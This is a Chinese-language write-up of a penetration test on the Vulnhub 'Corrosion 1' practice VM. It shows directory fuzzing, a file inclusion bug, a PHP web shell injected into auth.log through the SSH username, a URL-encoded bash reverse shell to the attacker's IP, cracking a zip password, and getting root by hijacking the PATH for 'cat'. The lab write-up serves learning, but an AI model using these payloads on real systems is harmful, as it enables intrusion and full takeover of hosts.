首页 > 其他分享 >【渗透测试】Vulnhub Corrosion 1

【渗透测试】Vulnhub Corrosion 1

时间:2024-01-15 14:14:35浏览次数:35  
标签:Corrosion log 渗透 192.168 blog Vulnhub txt 226.128 bash

渗透环境

攻击机:   IP: 192.168.226.129(Kali)
靶机:     IP:192.168.226.128
靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/

进行渗透

一、 获取端口信息

nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。

img

开放了22和80端口,访问80端口,可以正常访问。

img

二、 寻找WEB漏洞

对目录进行扫描,经过测试,使用dirsearch的默认字典扫描结果会有缺失,并且对于这个环境来说gobuster的扫描速度更快,因此我们使用gobuster使用指定字典/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt进行扫描

gobuster dir -u http://192.168.226.128/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-u :指定爆破网站
-w :指定字典

扫描结果如下

img

访问host/tasks

img

打开tasks_todo.txt,获得以下提示

img

访问host/blog-post,没有发现有用信息

img

host/blog-post目录再次进行扫描

gobuster dir -u http://192.168.226.128/blog-post -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描结果如下

img

访问hosst/blog-post/archives/,发现randylogs.php,直接点击打开是空白的。

img

看了其他师傅们的文章,这里是有一个文件包含漏洞,但是我们不知道传什么参,因此我们fuzz以下,参数值就设置为/etc/passwd,得到fuzz结果为file。

wfuzz -w /usr/share/wordlists/dirb/common.txt --hl 0 'http://192.168.226.128/blog-post/archives/randylogs.php?FUZZ=/etc/passwd'

-w :指定字典
-hl 0: 输出返回页面长度大于0的结果

除了使用wfuzz还可以使用fuff
ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.226.128/blog-post/archives/randylogs.php?FUZZ=/etc/passwd' -fs 0

img

读取/etc/passwd内容,成功验证存在文件包含漏洞

img

三、 漏洞利用

根据前面tasks_todo.txt的提示,我们在/var/log/(日志文件一般都存在这儿)下发现了auth.log

http://192.168.226.128/blog-post/archives/randylogs.php?file=/var/log/auth.log

22端口是SSH服务的端口号,我们将一句话木马注入auth.log中。将一句话木马作为用户名连接靶机。这里我们使用system()而不使用eval(),这样可以通过终端返回的一些信息判断是否成功注入一句话木马。

ssh '<?php system($_GET['soap']);?>'@192.168.226.128

接下来我们对soap传参ifconfig或者其他命令,若成功返回信息,则可验证注入成功

http://192.168.226.128/blog-post/archives/randylogs.php?file=/var/log/auth.log&soap=ifconfig

img

验证注入成功,由于这是个log文件,不是php文件,因此我们无法使用蚁剑等工具连接一句话木马,不过可以用相同思路反弹shell。

启动监听,端口为4444

nc -nlvp 4444

连接监听端口

http://192.168.226.128/blog-post/archives/randylogs.php?file=/var/log/auth.log&soap=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.226.129%2F4444%200%3E%261%27

soap的参数值是
bash -c 'bash -i >& /dev/tcp/192.168.226.129/4444 0>&1' 的URL编码
也可以用
echo "bash -i >& /dev/tcp/192.168.226.129/4444 0>&1" | bash 的URL编码

成功反弹shell

img

四、 提权

常规思路,先看一下有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

没有发现可利用的文件。但是在/var下发现backups

img

user_backup.zip传到kali看看能不能获得有用信息。

img

靶机启动python搭建简易服务器

python3 -m http.server 8000

kali下载文件

wget http://192.168.226.128:8000/user_backup.zip 

img

在kali中解压,发现需要密码,使用fcrackzip进行爆破,使用/usr/share/wordlists/rockyou.txt字典(kali自带,使用前先解压)

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user_backup.zip

得到密码!randybaby

img

解压文件

unzip user_backup.zip

然后输入密码,即可解压。解压后发现文件my_password.txt,猜测是用户randy的ssh连接密码,登陆成功。

img

接下来我们就可以查看当前用户能以管理员身份运行的命令

sudo -l

img

发现easysysinfo可以以管理员身份运行,我们上面解压后也得到easysysinfo.c,查看一下,发现easysysinfo会调用cat,而且没有使用绝对路径,那么我们就可以重写一个cat,并将其加入系统的环境变量,通过重写的cat实现提权

img

echo 'chmod +s /bin/bash' > cat     //在当前文件夹下写一个cat文件
chmod 777 cat                       //更改权限
export PATH=/home/randy/tools:$PATH     //将当前路径加入环境变量
./easysysinfo                   //执行easysysinfo,会调用我们重写的cat
/bin/bash -p            //root身份运行bash

chmod +s /bin/bash 是设置bash的setuid位,让用户在运行bash的过程中暂时获得拥有者的权限,运行easysysinfo时调用的是我们写的cat,就会让bash的setuid被设置,随后就可以以特权身份运行bash

img

发现flag在/root下,由于我们已经重写cat,因此我们用more来读取

img

渗透结束

标签:Corrosion,log,渗透,192.168,blog,Vulnhub,txt,226.128,bash
From: https://www.cnblogs.com/MrSoap/p/17965221

相关文章

  • 记一次docker出全linux的内网渗透题目(仿照2023铸剑杯)
    前言在2023年末的时候参加了一个铸剑杯,这个比赛主要是渗透和实网攻防,仿照这个比赛的历程做了个渗透靶场(环境与铸剑杯有很大区别,这里只有三层(因为我比较菜,只做出来了两层))顺便学习一下dockergithub下载然后运行startup.sh就可以自动搭建了使用https://www.itsvse.com/do......
  • 渗透测试基本流程
    渗透测试基本流程1.明确目标2.分析风险,获得授权3.信息收集4.漏洞探测(手动&自动)5.漏洞验证6.信息分析7.利用漏洞,获取数据8.信息整理9.形成报告1.明确目标1)确定范围:测试的范围,如:IP、域名、内外网、整站or部分模块;2)确定规则:能渗透到什么程度(发现漏洞为止or继续利用漏洞)、时间限制、能......
  • 干货 | 超详细的渗透测试思维导图
    ......
  • 针对向吃鸡外挂站开炮的渗透案例
    一、案例1因为最近吃鸡被外挂打自闭了,所以准备也让那些卖挂的体会一下什么叫做自闭。昨天晚上爬了快1000个卖吃鸡外挂的平台你们这些卖挂的,等我有空了一个一个捶。发现大多数都是用的一套aspx的程序,可惜没有源码不能白盒审计,黑盒也找不到什么洞只能找找软柿子捏,昨天晚上一口气锤了......
  • 记一次针对BC杀猪盘渗透一条龙
    0X00    歪打正着无意间碰到一套垃圾菠菜网站杀猪盘挨个访问能扫描出来的目录与文件发现并没有太大作用,不过发现了后台地址。phpmyadmin访问500。访问xd.php到后台访问发现还需要授权验证码试了下8888,123456之类的都提示错误,当场关闭。尝试子域名爆破也只有一个。Nmap扫描......
  • 记一次对菠菜网站渗透攻击
    我们找到一个带有有漏洞的QP后台框架的后台这个框架有很多的漏洞,比如用户遍历,我们如果输入一个存在的用户,密码错误时,就会提示用户或密码错误,如果我们输入一个不存在的用户,就会提示用户不存在除此之外,网站还会存在SQL注入漏洞,我们只需要抓一个提交账号密码的POST包粘贴好一个txt文......
  • 记一次某杀猪盘渗透测试
    最近偶然发现一个虚拟货币买涨跌的杀猪盘,遂进行了一波测试,前台长这样。为thinkphp5.0.5随用RCE进行打入,成功写入webshell。s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_dec......
  • 记一次对某杀猪盘站点的实战渗透
    前言昨天半夜看到一篇文章 某菠菜网站渗透实战就想着自己也练一练手,打到一半发现,大师傅们对这类站点已经狠狠的蹂躏了,所以借鉴师傅们的经验,本着锻炼一下,想到哪就记一下,所以写的比较杂乱,其中有没有解决的地方也记录下来的,然后又换了个站点接着走了下去信息收集前台这样看一下其他......
  • vulnhub-symfonos
    symfonos日常练习0x01信息收集老规矩,信息收集,用nmap扫。192.168.56.3存活。因为80端口开着,浏览器打开看看。页面上没有什么有价值的信息,于是尝试路径爆破。dirsearch-u192.168.56.3[10:13:48]301-313B-/manual->http://192.168.56.3/manual/[10:13:48]......
  • pikachu(渗透测试)靶场通关笔记(持续更新)
    pikachu渗透测试靶场靶场的搭建:打开浏览器搜索pikachu的搭建,网上有很多佬都写过,我就不写了暴力破解:概述:BurteForce(暴力破解)概述​暴力破解是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取,其过程就是使用大量的认证信息在认证接口进行尝试......